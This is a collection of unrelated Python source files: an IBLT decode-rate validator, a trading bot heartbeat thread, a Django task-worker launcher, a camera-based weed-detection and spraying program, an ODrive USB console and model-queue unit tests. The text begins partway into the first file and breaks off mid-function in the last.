# Number of parallel worker processes (also the row-interleaving stride).
PROCESSES = 4
def trial(hedge,k,entries):
    """Repeatedly build and decode an IBLT until the decode-rate estimate is tight.

    :param hedge: IBLT size multiplier.
    :param k: number of hash functions.
    :param entries: number of random items inserted per trial.
    :returns: (successes, trials, success_probability, ci_halfwidth, serialized_size)
    """
    trials=0
    successes=0
    while (True):
        p=PYBLT(entries=entries,value_size=9,hedge=hedge,num_hashes=k)
        # Insert `entries` random 32-bit keys, then check full decodability.
        for _ in range(entries):
            p.insert(random.getrandbits(32), 0)
        if (p.list_entries()[0]==True):
            successes+=1
        trials+=1
        ssize=p.get_serialized_size()
        prob = successes/trials
        if successes<trials:
            # Normal-approximation 95% confidence half-width.
            ci = 1.96*math.sqrt(prob*(1-prob)/trials)
        else:
            # All successes so far: exact one-sided bound at the 5% level.
            ci = -(math.exp(math.log(.05)/trials)-1)
        # Stop once the interval is tighter than a third of 1/240.
        if ( ci<=(1/240)/3 ):
            return successes,trials,prob,ci,ssize
def validate_rows(lock, m):
    """Re-run IBLT decode-rate trials for this worker's rows of the CSV on argv[1].

    Worker *m* handles rows whose n values are m, m+PROCESSES, m+2*PROCESSES, ...
    For each row, two independent trials are run; the serialized size must match
    exactly, and each measured decode rate must meet the recorded goal (or at
    least contain it within its 95% confidence interval).

    Fixes over the original: the multi-line `if` and `print` had syntax errors
    (missing parentheses), `sys` was used but never imported, the size check
    referenced an undefined name `ssize` (NameError), and the summary format
    string had 11 placeholders for 9 values.

    :param lock: multiprocessing.Lock serializing stdout across workers.
    :param m: this worker's 1-based index in [1, PROCESSES].
    """
    import sys  # argv[1] is the CSV to validate
    count = 0
    with open(sys.argv[1], 'r') as fd:
        fd.readline()  # skip the CSV header row
        for row in csv.reader(fd, delimiter=','):
            n, hedge, keys, size, goal = row
            n = int(n)
            # Interleave rows across workers: take only n == m + PROCESSES*count.
            if n != m + PROCESSES * count:
                continue
            count += 1
            hedge = float(hedge)
            keys = int(keys)
            goal = float(goal)
            size = int(size)
            # first independent trial
            successes1, trials1, prob1, ci1, ssize1 = trial(hedge, keys, n)
            # check size of the IBLT (deterministic; must always pass)
            if ssize1 != size:
                lock.acquire()
                print(n, "FAIL: size test")
                lock.release()
                return
            # second independent trial
            successes2, trials2, prob2, ci2, ssize2 = trial(hedge, keys, n)
            # check decode rate: each measured rate must beat the goal, or the
            # goal must at least lie inside the trial's confidence interval
            ok1 = prob1 - ci1 >= goal or (prob1 - ci1 < goal < prob1 + ci1)
            ok2 = prob2 - ci2 >= goal or (prob2 - ci2 < goal < prob2 + ci2)
            if not (ok1 and ok2):
                lock.acquire()
                print(n, "Double check decode rates for %d items:\t%f\t%f" % (n, prob1, prob2))
                lock.release()
            lock.acquire()
            print("%d, %f, %d, %d, %d, %f, %d, %d, %f" % (n, hedge, keys,
                                                          successes1, trials1, prob1,
                                                          successes2, trials2, prob2))
            lock.release()
# Shared lock so worker processes don't interleave their stdout lines.
lock = Lock()
# count from 1; can't have an IBLT with 0 entries
for num in range(1,PROCESSES+1):
    Process(target=validate_rows, args=(lock, num)).start()
|
heartbeat.py
|
# -*- coding: utf-8 -*-
# ==========================================
# Discord
# ==========================================
import time
from datetime import datetime, timedelta, timezone
# thred操作
import threading
# from puppeteer import Puppeteer
# ==============================================================
# Heartbeat class
# param:
#   puppeteer: Puppeteer object
# ==============================================================
class Heartbeat:
    # ==========================================================
    # Initialization
    # param:
    #   Puppeteer: Puppeteer object
    # ==========================================================
    def __init__(self, Puppeteer):
        self._exchange = Puppeteer._exchange  # exchange object (ccxt.bitmex)
        self._logger = Puppeteer._logger  # logger
        self._config = Puppeteer._config  # configuration file
        self._ws = Puppeteer._ws  # websocket
        self._bitmex = Puppeteer._bitmex  # ccxt.bitmex wrapper object
        self._discord = Puppeteer._discord  # discord
        self._puppeteer = Puppeteer  # puppeteer
        # websocket is disabled
        if not self._config["USE_WEBSOCKET"]:
            self._logger.warning("heartbeat check is None. because [not websocket]")
        # -------------------------------------------------------
        # Timestamp at start-up (UTC)
        # -------------------------------------------------------
        self._tz = timezone.utc
        self._ts = datetime.now(self._tz).timestamp()
        # -------------------------------------------------------
        # Heartbeat-monitoring thread (daemon)
        # -------------------------------------------------------
        self._check_heart_beat_thread = threading.Thread(
            target=self.__run, args=("check_heart_beat",)
        )
        self._check_heart_beat_thread.daemon = True
        self._check_heart_beat_thread.start()
        self._logger.debug("Started check heart beat thread")
    # ===========================================================
    # Destructor
    # ===========================================================
    def __del__(self):
        self._check_heart_beat_thread.join(timeout=3)  # TODO: confirm this timeout is appropriate
    # ==========================================================
    # run
    # ==========================================================
    def __run(self, args):
        # Once a minute: verify the Puppeteer loop and websocket are alive;
        # reconnect the websocket if either has stalled for more than 60 s.
        while True:
            # ---------------------------------------------------
            # Wait for the top of the minute (seconds in 0..2)
            # ---------------------------------------------------
            while datetime.now(self._tz).second not in [0, 1, 2]:
                time.sleep(0.5)
            # start
            start = time.time()
            self._ts = datetime.now(self._tz).timestamp()
            # ---------------------------------------------------
            # Main processing
            # ---------------------------------------------------
            try:
                # -----------------------------------------------
                # Puppeteer liveness heartbeat
                # -----------------------------------------------
                if self._ts - self._puppeteer._ts > 60:
                    # Puppeteer has not advanced its timestamp for 60 seconds
                    self._logger.error(
                        "puppeteer ts:{}, diff:{}".format(
                            self._puppeteer._ts, self._ts - self._puppeteer._ts
                        )
                    )
                    # reconnect websocket
                    self._puppeteer._ws.exited = False
                    self._puppeteer._ws.reconnect()
                # -----------------------------------------------
                # websocket liveness heartbeat
                # -----------------------------------------------
                elif self._ts - self._ws._ts > 60:
                    # No websocket data received for more than 60 seconds
                    self._logger.error(
                        "websocket ts:{}, diff:{}, status:{}".format(
                            self._ws._ts, self._ts - self._ws._ts, self._ws._ws_status
                        )
                    )
                    # reconnect websocket
                    self._puppeteer._ws.exited = False
                    self._puppeteer._ws.reconnect()
            except Exception as e:
                self._logger.error("check heart beat thread: Exception: {}".format(e))
                time.sleep(5)
            # end
            end = time.time()
            elapsed_time = end - start
            # ---------------------------------------------------
            # Timing adjustment for the next cycle
            # ---------------------------------------------------
            if elapsed_time >= 60:
                # Should not normally take this long, but log it just in case
                self._logger.warning(
                    "check heart beat thread: use time {}".format(elapsed_time)
                )
            else:
                # Sleep until 5 seconds before the next minute boundary
                now_sec = datetime.now(self._tz).second
                if now_sec >= 55:
                    pass
                else:
                    time.sleep(55 - now_sec)
|
main.py
|
# Setup logs
import django
import logging
import os
import threading
from django.utils import timezone
import time
# Root log level comes from the environment; fails fast if LOG_LEVEL is unset.
logging.basicConfig(level=os.environ['LOG_LEVEL'])
logger = logging.getLogger(__name__)
# Number of worker threads started per controller kind.
parallelism = int(os.environ['DUEL_PARALLELISM'])
# Optional tag identifying this TaskWorker DB row; standalone mode when unset.
do_tag = os.environ.get('DO_TAG')
# Start Django in stand-alone mode
logger.info('Setup django')
django.setup()
if __name__ == "__main__":
    # Imported after django.setup() so the ORM/models are ready.
    from duel_runner.smoke import SmokeController
    from duel_runner.tournament import TournamentController
    from core.models import TaskWorker
    logger.info('Start app')
    smoke = SmokeController()
    tournament = TournamentController()
    threads = []
    task_worker = None
    if do_tag:
        # Mark worker as ready
        task_worker = TaskWorker.objects.get(tag=do_tag)
        logger.info(f'Set task worker {task_worker} as ready')
        task_worker.state = TaskWorker.READY
        task_worker.ready_at = timezone.now()
        task_worker.save()
        smoke.task_worker = task_worker
        tournament.task_worker = task_worker
    for i in range(parallelism):
        # Start one thread for each controller
        threads.append(threading.Thread(target=smoke.run))
        threads.append(threading.Thread(target=tournament.run))
    for t in threads:
        t.start()
    if do_tag:
        # Monitor for stop signal: poll the DB row every 15 s until its state
        # leaves READY, then ask both controllers to wind down.
        while True:
            time.sleep(15)
            task_worker.refresh_from_db()
            if task_worker.state != TaskWorker.READY:
                logger.info(f'Handling stop signal')
                smoke.stop = True
                tournament.stop = True
                break
    else:
        logger.info('Standalone mode')
    # Wait for all tasks to end
    for t in threads:
        t.join()
    if do_tag:
        # Mark worker as done
        logger.info(f'Set task worker {task_worker} as stopped')
        task_worker.state = TaskWorker.STOPPED
        task_worker.stopped_at = timezone.now()
        task_worker.save()
|
greenonbrown.py
|
#!/home/pi/.virtualenvs/owl/bin/python3
from algorithms import exg, exg_standardised, exg_standardised_hue, hsv, exgr, gndvi
from button_inputs import Selector, Recorder
from image_sampler import image_sample
from imutils.video import VideoStream, FileVideoStream, FPS
from relay_control import Controller
from queue import Queue
from time import strftime
import subprocess
import imutils # reference PyImageSearch
import shutil
import numpy as np # reference
import time
import sys
import cv2 # reference
import os
def nothing(x):
    """No-op callback required by cv2.createTrackbar; ignores its argument."""
    return None
def green_on_brown(image, exgMin=30, exgMax=250, hueMin=30, hueMax=90, brightnessMin=5, brightnessMax=200, saturationMin=30,
                   saturationMax=255, minArea=1, headless=True, algorithm='exg'):
    '''
    Uses a provided algorithm and contour detection to determine green objects in the image. Min and Max
    thresholds are provided.
    :param image: input image to be analysed
    :param exgMin: index values at or below this are zeroed before thresholding
    :param exgMax: index values above this are zeroed before thresholding
    :param hueMin: minimum HSV hue (passed to the hue-based algorithms only)
    :param hueMax: maximum HSV hue (passed to the hue-based algorithms only)
    :param brightnessMin: minimum HSV brightness/value (hue-based algorithms only)
    :param brightnessMax: maximum HSV brightness/value (hue-based algorithms only)
    :param saturationMin: minimum HSV saturation (hue-based algorithms only)
    :param saturationMax: maximum HSV saturation (hue-based algorithms only)
    :param minArea: minimum area for the detection - used to filter out small detections
    :param headless: True: no windows display; False: watch what the algorithm does
    :param algorithm: the algorithm to use. Defaults to ExG if not correct
    :return: (contours, bounding boxes as [x, y, w, h], weed centres as [cx, cy],
              the input image annotated with red bounding boxes)
    '''
    # different algorithm options, add in your algorithm here if you make a new one!
    # threshedAlready marks algorithms (currently only 'hsv') whose output is
    # already a binary mask and can skip the adaptive-threshold step.
    threshedAlready = False
    if algorithm == 'exg':
        output = exg(image)
    elif algorithm == 'exgr':
        output = exgr(image)
    elif algorithm == 'nexg':
        output = exg_standardised(image)
    elif algorithm == 'exhsv':
        output = exg_standardised_hue(image, hueMin=hueMin, hueMax=hueMax,
                                      brightnessMin=brightnessMin, brightnessMax=brightnessMax,
                                      saturationMin=saturationMin, saturationMax=saturationMax)
    elif algorithm == 'hsv':
        output, threshedAlready = hsv(image, hueMin=hueMin, hueMax=hueMax,
                                      brightnessMin=brightnessMin, brightnessMax=brightnessMax,
                                      saturationMin=saturationMin, saturationMax=saturationMax)
    elif algorithm == 'gndvi':
        output = gndvi(image)
    else:
        # unrecognised algorithm name: fall back to plain ExG and warn
        output = exg(image)
        print('[WARNING] DEFAULTED TO EXG')
    if not headless:
        cv2.imshow("Threshold", output)
    # run the thresholds provided
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
    # if not a binary image, run an adaptive threshold on the area that fits within the thresholded bounds.
    if not threshedAlready:
        # zero pixels outside (exgMin, exgMax], then binarise adaptively
        output = np.where(output > exgMin, output, 0)
        output = np.where(output > exgMax, 0, output)
        output = np.uint8(np.abs(output))
        if not headless:
            cv2.imshow("post", output)
        thresholdOut = cv2.adaptiveThreshold(output, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 2)
        thresholdOut = cv2.morphologyEx(thresholdOut, cv2.MORPH_CLOSE, kernel, iterations=1)
    # if already binary, run morphological operations to remove any noise
    if threshedAlready:
        thresholdOut = cv2.morphologyEx(output, cv2.MORPH_CLOSE, kernel, iterations=5)
    if not headless:
        cv2.imshow("Threshold", thresholdOut)
    # find all the contours on the binary images
    cnts = cv2.findContours(thresholdOut.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cnts = imutils.grab_contours(cnts)
    weedCenters = []
    boxes = []
    # loop over all the detected contours and calculate the centres and bounding boxes
    for c in cnts:
        # filter based on total area of contour
        if cv2.contourArea(c) > minArea:
            # calculate the min bounding box
            startX, startY, boxW, boxH = cv2.boundingRect(c)
            endX = startX + boxW
            endY = startY + boxH
            # annotate the detection with a red box on the returned image
            cv2.rectangle(image, (int(startX), int(startY)), (endX, endY), (0, 0, 255), 2)
            # save the bounding box
            boxes.append([startX, startY, boxW, boxH])
            # compute box center
            centerX = int(startX + (boxW / 2))
            centerY = int(startY + (boxH / 2))
            weedCenters.append([centerX, centerY])
    # returns the contours, bounding boxes, centroids and the image on which the boxes have been drawn
    return cnts, boxes, weedCenters, image
# the Owl class: ties camera capture, detection and nozzle control together
class Owl:
    """Detect green weeds in a camera stream and fire the matching spray nozzles.

    Wires together the video source, the green_on_brown() detector, optional
    button-controlled video recording, and the relay Controller that actuates
    the nozzles.
    """

    def __init__(self, video=False, videoFile=None, recording=False, nozzleNum=4, headless=True,
                 exgMin=30, exgMax=180, hueMin=30, hueMax=92, brightnessMin=5, brightnessMax=200,
                 saturationMin=30, saturationMax=255, resolution=(832, 624), framerate=32):
        """Set up thresholds, camera, optional recorder and the nozzle controller.

        :param video: True to read frames from videoFile instead of a camera
        :param videoFile: path of the test video when video is True
        :param recording: True to enable GPIO-button-controlled recording
        :param nozzleNum: number of spray nozzles / image lanes
        :param headless: True disables all display windows and trackbars
        :param exgMin..saturationMax: detection thresholds (see green_on_brown)
        :param resolution: camera resolution as (width, height)
        :param framerate: camera framerate
        """
        # different detection parameters
        self.headless = headless
        self.recording = recording
        self.resolution = resolution
        self.framerate = framerate
        # threshold parameters for different algorithms
        self.exgMin = exgMin
        self.exgMax = exgMax
        self.hueMin = hueMin
        self.hueMax = hueMax
        self.saturationMin = saturationMin
        self.saturationMax = saturationMax
        self.brightnessMin = brightnessMin
        self.brightnessMax = brightnessMax
        # setup the track bars if headless is False
        if not self.headless:
            # create trackbars for the threshold calculation
            cv2.namedWindow("Params")
            cv2.createTrackbar("thresholdMin", "Params", self.exgMin, 255, nothing)
            cv2.createTrackbar("thresholdMax", "Params", self.exgMax, 255, nothing)
        # Recording state is initialised unconditionally so stop() can always
        # test self.record / self.writer, even when hoot() exits before its
        # first loop iteration. (Previously these attributes only existed on
        # one side of the recording branch, risking AttributeError.)
        self.record = False
        self.saveRecording = False
        self.writer = None
        # instantiate the video codec if recording is enabled
        if self.recording:
            self.fourcc = cv2.VideoWriter_fourcc(*'MJPG')
        # check if test video or videostream from camera
        if video:
            self.cam = FileVideoStream(videoFile).start()
        # if no video, start the camera with the provided parameters
        else:
            try:
                self.cam = VideoStream(usePiCamera=True, resolution=self.resolution, framerate=self.framerate).start()
            except ModuleNotFoundError:
                # no picamera support available - fall back to the default webcam
                self.cam = VideoStream(src=0).start()
            # brief warm-up pause for the camera
            time.sleep(1.0)
        # set the sprayqueue size
        self.sprayQueue = Queue(maxsize=10)
        # nozzleDict maps the reference nozzle number to a boardpin on the embedded device
        self.nozzleDict = {
            0: 13,
            1: 15,
            2: 16,
            3: 18
        }
        ### Data collection only ###
        # algorithmDict maps pins to algorithms for data collection
        self.algorithmDict = {
            "exg": 29,
            "nexg": 31,
            "hsv": 33,
            "exhsv": 35,
        }
        # this is where the recording button can be added. Currently set to pin 37
        if self.recording:
            self.recorderButton = Recorder(recordGPIO=37)
        ############################
        # instantiate the nozzle controller - successful start should beep the buzzer
        self.controller = Controller(nozzleDict=self.nozzleDict)
        # instantiate the logger
        self.logger = self.controller.logger
        # sensitivity and weed size to be added
        self.sensitivity = None
        self.laneCoords = {}
        # add the total number of nozzles. This can be changed easily, but the nozzleDict and physical relays would need
        # to be updated too. Fairly straightforward, so an opportunity for more precise application
        self.nozzleNum = nozzleNum

    def hoot(self, sprayDur, sample=False, sampleDim=400, saveDir='output', camera_name='cam1', algorithm='exg', selectorEnabled=False, minArea=10):
        """Main capture/detect/spray loop; runs until ESC, stream end or Ctrl-C.

        :param sprayDur: seconds each nozzle stays open per detection
        :param sample: reserved for the (currently commented-out) image sampler
        :param sampleDim: sample image dimension for the sampler
        :param saveDir: base directory for video recordings
        :param camera_name: label embedded in recording file names
        :param algorithm: detection algorithm passed to green_on_brown()
        :param selectorEnabled: True to pick the algorithm with the GPIO selector
        :param minArea: minimum contour area for a valid detection
        """
        # track FPS and framecount
        fps = FPS().start()
        if selectorEnabled:
            self.selector = Selector(switchDict=self.algorithmDict)
        try:
            while True:
                frame = self.cam.read()
                if selectorEnabled:
                    algorithm, newAlgorithm = self.selector.algorithm_selector(algorithm)
                    if newAlgorithm:
                        self.logger.log_line('[NEW ALGO] {}'.format(algorithm))
                if self.recording:
                    self.record = self.recorderButton.record
                    self.saveRecording = self.recorderButton.saveRecording
                if frame is None:
                    # end of the video file / camera stream
                    fps.stop()
                    print("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()))
                    self.stop()
                    break
                if self.record and self.writer is None:
                    # Bug fix: compute the dated directory into a local
                    # variable instead of rebinding saveDir, so starting a
                    # second recording no longer nests a new timestamped
                    # directory inside the previous one.
                    recordDir = os.path.join(saveDir, strftime("%Y%m%d-{}-{}".format(camera_name, algorithm)))
                    if not os.path.exists(recordDir):
                        os.makedirs(recordDir)
                    self.baseName = os.path.join(recordDir, strftime("%Y%m%d-%H%M%S-{}-{}".format(camera_name, algorithm)))
                    videoName = self.baseName + '.avi'
                    self.logger.new_video_logfile(name=self.baseName + '.txt')
                    self.writer = cv2.VideoWriter(videoName, self.fourcc, 30, (frame.shape[1], frame.shape[0]), True)
                # retrieve the trackbar positions for thresholds
                if not self.headless:
                    self.exgMin = cv2.getTrackbarPos("thresholdMin", "Params")
                    self.exgMax = cv2.getTrackbarPos("thresholdMax", "Params")
                else:
                    # this leaves it open to adding dials for sensitivity. Static at the moment, but could be dynamic
                    self.update(exgMin=self.exgMin, exgMax=self.exgMax)  # add in update values here
                # pass image, thresholds to green_on_brown function
                cnts, boxes, weedCentres, imageOut = green_on_brown(frame.copy(), exgMin=self.exgMin,
                                                                    exgMax=self.exgMax,
                                                                    hueMin=self.hueMin,
                                                                    hueMax=self.hueMax,
                                                                    saturationMin=self.saturationMin,
                                                                    saturationMax=self.saturationMax,
                                                                    brightnessMin=self.brightnessMin,
                                                                    brightnessMax=self.brightnessMax,
                                                                    headless=self.headless,
                                                                    algorithm=algorithm, minArea=minArea)
                ##### IMAGE SAMPLER #####
                # record sample images if required of weeds detected
                # uncomment if needed
                # if frameCount % 60 == 0 and sample is True:
                #     saveFrame = frame.copy()
                #     sampleThread = Thread(target=image_sample, args=[saveFrame, weedCentres, saveDir, sampleDim])
                #     sampleThread.start()
                #########################
                # activation region limit - once weed crosses this line, nozzle is activated
                self.yAct = int((0.2) * frame.shape[0])
                laneWidth = imageOut.shape[1] / self.nozzleNum
                # calculate lane coords and draw on frame
                for i in range(self.nozzleNum):
                    laneX = int(i * laneWidth)
                    # cv2.line(displayFrame, (laneX, 0), (laneX, imageOut.shape[0]), (0, 255, 255), 2)
                    self.laneCoords[i] = laneX
                # loop over the ID/weed centres from contours
                for ID, centre in enumerate(weedCentres):
                    # if they are in activation region the spray them
                    if centre[1] > self.yAct:
                        sprayTime = time.time()
                        for i in range(self.nozzleNum):
                            # determine which lane needs to be activated
                            if int(self.laneCoords[i]) <= centre[0] < int(self.laneCoords[i] + laneWidth):
                                # log a spray job with the controller using the nozzle, timestamp and spray duration
                                self.controller.receive(nozzle=i, timeStamp=sprayTime, duration=sprayDur)
                # update the framerate counter
                fps.update()
                if not self.headless:
                    cv2.imshow("Output", imutils.resize(imageOut, width=600))
                if self.record and not self.saveRecording:
                    self.writer.write(frame)
                if self.saveRecording and not self.record:
                    # recording button released: flush the file and reset for the next one
                    self.writer.release()
                    self.controller.solenoid.beep(duration=0.1)
                    self.recorderButton.saveRecording = False
                    fps.stop()
                    self.writer = None
                    self.logger.log_line_video("[INFO] {}. Approximate FPS: {:.2f}".format(self.baseName, fps.fps()), verbose=True)
                    fps = FPS().start()
                k = cv2.waitKey(1) & 0xFF
                if k == 27:
                    # ESC pressed - shut down cleanly
                    fps.stop()
                    self.logger.log_line_video("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()), verbose=True)
                    self.stop()
                    break
        except KeyboardInterrupt:
            fps.stop()
            self.logger.log_line_video("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()), verbose=True)
            self.stop()
        except Exception as e:
            # five long beeps signal a crash to the operator in the field
            self.controller.solenoid.beep(duration=0.5, repeats=5)
            self.logger.log_line("[CRITICAL ERROR] STOPPED: {}".format(e))

    # still in development
    def update_software(self):
        """Install a new 'owl' release from a connected USB drive.

        Archives the current /home/pi/owl tree into a timestamped backup
        directory first, then moves any item on the USB drive whose name
        contains 'owl' into the working directory.
        """
        USBDir, USBConnected = check_for_usb()
        if USBConnected:
            files = os.listdir(USBDir)
            workingDir = '/home/pi'
            # move old version to version control directory first
            oldVersionDir = strftime(workingDir + "/%Y%m%d-%H%M%S_update")
            os.mkdir(oldVersionDir)
            currentDir = '/home/pi/owl'
            shutil.move(currentDir, oldVersionDir)
            # move new directory to working directory
            for item in files:
                if 'owl' in item:
                    # Bug fix: shutil.move() was previously called with no
                    # arguments, which raised TypeError; move the matching
                    # item from the USB drive into the working directory.
                    shutil.move(os.path.join(USBDir, item), os.path.join(workingDir, item))

    def stop(self):
        """Shut everything down: controller, solenoids, camera, writer and windows."""
        self.controller.running = False
        self.controller.solenoid.all_off()
        # two short beeps signal a clean shutdown
        self.controller.solenoid.beep(duration=0.1)
        self.controller.solenoid.beep(duration=0.1)
        self.cam.stop()
        if self.record:
            self.writer.release()
            self.recorderButton.running = False
        if not self.headless:
            cv2.destroyAllWindows()
        sys.exit()

    def update(self, exgMin=30, exgMax=180):
        """Update the ExG thresholds used for the next processed frame."""
        self.exgMin = exgMin
        self.exgMax = exgMax
def check_for_usb():
    """Locate a mounted USB drive under /media/pi.

    Returns (save_directory, usb_connected). Falls back to the local videos
    directory when nothing is mounted, and to '/videos/' on Windows (where
    os.setsid does not exist and raises AttributeError).
    """
    try:
        proc = subprocess.Popen('ls /media/pi', shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE)
        usbName = proc.stdout.readline().rstrip().decode('utf-8')
    except AttributeError:
        # os.setsid is missing on Windows
        print('[INFO] Windows computer detected...')
        return '/videos/', False
    if usbName:
        print('[INFO] Saving to {} usb'.format(usbName))
        return '/media/pi/{}/'.format(usbName), True
    print('[INFO] No USB connected. Saving to videos')
    return '/home/pi/owl/videos', False
# business end of things
if __name__ == "__main__":
    # Thresholds given here override the Owl defaults.
    owl = Owl(video=False,
              videoFile=r'',
              headless=True,
              recording=False,
              exgMin=25,
              exgMax=200,
              hueMin=39,
              hueMax=83,
              saturationMin=50,
              saturationMax=220,
              brightnessMin=60,
              brightnessMax=190,
              framerate=32,
              resolution=(416, 320))
    # start the targeting!
    owl.hoot(sprayDur=0.15,
             sample=False,
             sampleDim=1000,
             saveDir='/home/pi',
             algorithm='exhsv',
             selectorEnabled=False,
             camera_name='hsv',
             minArea=10)
|
test_bulk.py
|
#! /usr/bin/env python3
import argparse
def parse_args():
    """Parse command-line arguments for the USB bulk communication test."""
    arg_parser = argparse.ArgumentParser(
        description='Talk to a ODrive board over USB bulk channel.')
    return arg_parser.parse_args()
if __name__ == '__main__':
    # parse args before other imports
    args = parse_args()

import sys
import time
import threading
from odrive import usbbulk

# Shared flags between the console loop and the receive thread:
# 'running' keeps both loops alive; 'ready' is set once the firmware
# banner has been received.
running = True
ready = False
def main(args):
    """Interactive console: poll for an ODrive device, print its banner, then
    forward typed commands to the device while recieve_thread echoes replies.
    """
    global running
    print("ODrive USB Bulk Communications")
    print("---------------------------------------------------------------------")
    print("USAGE:")
    print("\tPOSITION_CONTROL:\n\t\tp MOTOR_NUMBER POSITION VELOCITY CURRENT")
    print("\tVELOCITY_CONTROL:\n\t\tv MOTOR_NUMBER VELOCITY CURRENT")
    print("\tCURRENT_CONTROL:\n\t\tc MOTOR_NUMBER CURRENT")
    print("---------------------------------------------------------------------")
    # query device
    dev = usbbulk.poll_odrive_bulk_device(printer=print)
    print (dev.info())
    print (dev.init())
    # thread
    thread = threading.Thread(target=recieve_thread, args=[dev])
    thread.start()
    while running:
        time.sleep(0.1)
        try:
            command = input("Enter ODrive command:\n")
            dev.send(command)
        except:
            # any error (including EOF / Ctrl-C at the prompt) ends the session
            running = False
def recieve_thread(dev):
    """Background loop: drain the device's receive buffer and echo it to stdout.

    Sets the module-level 'ready' flag once the firmware banner is seen.
    (The 'recieve' spelling matches the device API methods used below.)
    """
    global ready
    while running:
        time.sleep(0.1)
        try:
            message = dev.recieve(dev.recieve_max())
            message_ascii = bytes(message).decode('ascii')
            print(message_ascii, end='')
            if "ODrive Firmware" in message_ascii:
                ready = True
        except:
            # best-effort: ignore transient USB read/decode errors
            pass


if __name__ == "__main__":
    main(args)
|
tests.py
|
import collections as co
import datetime as dt
import itertools
import random
import time

import pytest
from django.contrib.auth.models import User
from django.test import Client

import modelqueue as mq

from .models import Task


def nop(obj):
    """Worker callback that does nothing except assert the task's status is
    within the 'working' state range while it is being processed."""
    min_working = mq.Status.minimum(mq.State.working)
    max_working = mq.Status.maximum(mq.State.working)
    assert min_working <= obj.status <= max_working
@pytest.mark.django_db
def test_run_waiting_finished():
    """Tasks default to the waiting state and move to finished after a run."""
    count = 10
    for num in range(count):
        task = Task(data=str(num))
        task.save()
        # small sleep so each task gets a strictly later priority timestamp
        time.sleep(0.001)
    waiting_kwargs = mq.Status.filter('status', mq.State.waiting)
    waiting = Task.objects.filter(**waiting_kwargs)
    assert waiting.count() == count
    for num in range(count):
        tasks = Task.objects.all()
        task = mq.run(tasks, 'status', nop)
        # FIFO: tasks are processed in creation order
        assert task.data == str(num)
    assert mq.run(tasks, 'status', nop) is None
    finished_kwargs = mq.Status.filter('status', mq.State.finished)
    finished = Task.objects.filter(**finished_kwargs)
    assert finished.count() == count


@pytest.mark.django_db
def test_run_created():
    """Tasks in the 'created' state are not picked up by mq.run."""
    count = 10
    for num in range(count):
        task = Task(data=str(num), status=mq.Status.created())
        task.save()
    tasks = Task.objects.all()
    assert tasks.count() == count
    created_kwargs = mq.Status.filter('status', mq.State.created)
    created = Task.objects.filter(**created_kwargs)
    assert created.count() == count
    assert mq.run(tasks, 'status', nop) is None


@pytest.mark.django_db
def test_run_working():
    """mq.run returns the processed task and marks it finished."""
    task1 = Task(data=str(0))
    task1.save()
    task2 = mq.run(Task.objects.all(), 'status', nop)
    assert task1 == task2
    assert mq.Status(task2.status).state == mq.State.finished
def always_fails(obj):
    """Worker callback that validates state via nop() and then always raises."""
    nop(obj)
    raise RuntimeError


@pytest.mark.django_db
def test_run_canceled():
    """A task is retried three times (the default) and then canceled."""
    task = Task(data=str(0))
    task.save()
    for attempt in range(3):
        try:
            mq.run(Task.objects.all(), 'status', always_fails)
        except RuntimeError:
            pass
        else:
            assert False, 'runtime error expected'
        task.refresh_from_db()
        status = mq.Status(task.status)
        # still waiting, with the attempt counter incremented
        assert status.state == mq.State.waiting
        assert status.attempts == attempt + 1
    # the fourth failure exceeds the retry limit -> canceled
    try:
        mq.run(Task.objects.all(), 'status', always_fails)
    except RuntimeError:
        pass
    else:
        assert False, 'runtime error expected'
    task.refresh_from_db()
    status = mq.Status(task.status)
    assert status.state == mq.State.canceled
    assert status.attempts == 4
def control_c(obj):
    """Worker callback that simulates the user pressing Ctrl-C."""
    nop(obj)
    raise KeyboardInterrupt


@pytest.mark.django_db
def test_run_canceled_no_retry():
    """With retry=0 a single failure cancels the task immediately."""
    task = Task(data=str(0))
    task.save()
    try:
        mq.run(Task.objects.all(), 'status', control_c, retry=0)
    except KeyboardInterrupt:
        pass
    else:
        assert False, 'keyboard interrupt expected'
    task.refresh_from_db()
    status = mq.Status(task.status)
    assert status.state == mq.State.canceled
    assert status.attempts == 1
@pytest.mark.django_db
def test_run_timeout():
    """A task stuck in 'working' past its timeout is re-run and finished."""
    task = Task(data=str(0))
    task.save()
    state, priority, attempts = mq.Status(task.status).parse()
    assert state == mq.State.waiting
    # backdate the priority so the working status looks two hours old
    priority -= dt.timedelta(hours=2)
    assert attempts == 0
    task.status = mq.Status.working(priority, 0)
    task.save()
    assert mq.run(Task.objects.all(), 'status', nop) == task
    task.refresh_from_db()
    status = mq.Status(task.status)
    assert status.state == mq.State.finished
    # one attempt counted for the timed-out run, one for the successful rerun
    assert status.attempts == 2


@pytest.mark.django_db
def test_run_future():
    """A task scheduled for the future is not picked up yet."""
    future = mq.now() + mq.ONE_HOUR
    task = Task(data=str(0), status=mq.Status.waiting(future))
    task.save()
    assert mq.run(Task.objects.all(), 'status', nop) is None


@pytest.mark.django_db
def test_run_timeout_delay():
    """A timed-out task is requeued with the given delay instead of rerun."""
    past = mq.now() - mq.ONE_HOUR
    task = Task(data=str(0), status=mq.Status.working(past))
    task.save()
    assert mq.run(Task.objects.all(), 'status', nop, delay=mq.ONE_HOUR) is None
    task.refresh_from_db()
    status = mq.Status(task.status)
    assert status.state == mq.State.waiting
    assert status.attempts == 1
    # still delayed an hour into the future, so nothing runs now
    assert mq.run(Task.objects.all(), 'status', nop) is None


@pytest.mark.django_db
def test_run_error_delay():
    """A failing task is requeued with the given delay before its retry."""
    task = Task(data=str(0))
    task.save()
    tasks = Task.objects.all()
    try:
        mq.run(tasks, 'status', always_fails, delay=mq.ONE_HOUR)
    except RuntimeError:
        pass
    else:
        assert False, 'runtime error expected'
    task.refresh_from_db()
    status = mq.Status(task.status)
    assert status.state == mq.State.waiting
    assert status.attempts == 1
    assert mq.run(Task.objects.all(), 'status', always_fails) is None
def maybe(obj):
    """Worker callback with randomized outcomes: success, RuntimeError, or
    SystemExit (simulating a worker process dying mid-run)."""
    nop(obj)
    choice = random.randrange(3)
    if choice == 0:
        return
    elif choice == 1:
        raise RuntimeError
    else:
